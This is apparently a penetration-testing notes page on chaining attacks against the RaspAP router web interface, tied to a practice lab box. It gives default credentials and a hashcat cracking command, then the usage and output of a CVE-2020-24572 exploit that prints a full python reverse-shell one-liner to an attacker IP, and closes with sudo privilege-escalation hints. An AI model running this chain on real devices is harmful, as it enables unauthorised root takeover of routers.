Raspap

Exploiting Raspap - chaining attacks

Chaining exploits is possible to go from zero to root 🚀

Initial foothold

GitHub - RaspAP/raspap-webgui: The easiest, full-featured wireless router setup for Debian-based devices. Period.GitHub

Credentials

Default

Username - "admin"

Password - "secret"

Hash

Found in the raspap.auth file

└─$ cat raspap.auth 
admin
$2y$10$lXJPzK/26d7xtq1uGYyiXOJ904sIopZ7sDoJm/sD3vqcw0FRjcg2y

Can be cracked with hashcat:

hashcat -a 0 -m 3200 '$2y$10$lXJPzK/26d7xtq1uGYyiXOJ904sIopZ7sDoJm/sD3vqcw0FRjcg2y' /usr/share/wordlists/rockyou.txt --show

Console access may be possible

If authorized, it may be possible to access the web console /includes/webconsole.php

Exploits

CVE-2020-24572

CVE-2020-24572-POC/exploit.py at main · gerbsec/CVE-2020-24572-POCGitHub

-------------------------------------------------------------------------------------------------
USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass] [payload]
-------------------------------------------------------------------------------------------------
Payload options: 
1. nc reverse shell
2. bash reverse shell
3. python reverse shell
-------------------------------------------------------------------------------------------------

Getting a shell 😄

─$ python3 exploit2.py 192.168.234.97 8091 192.168.45.194 22 secret 3
[!] Using Reverse Shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.194",22));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[!] Sending activation request - Make sure your listener is running . . .
[>>>] Press ENTER to continue . . .

[!] You should have a shell :)

[!] Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh

Priv Esc

Run sudo -l to see what you can work with. There is a good chance scripts or services can be manipulated to grant root access.

Practice boxes

Proving grounds - Walla

PreviousrConfig NextSuiteCRM

Last updated 2 years ago

hashtagChaining exploits is possible to go from zero to root 🚀

hashtagInitial foothold

hashtagCredentials

hashtagDefault

hashtagHash

hashtagConsole access may be possible

hashtagExploits

hashtagCVE-2020-24572

hashtagPriv Esc

hashtagPractice boxes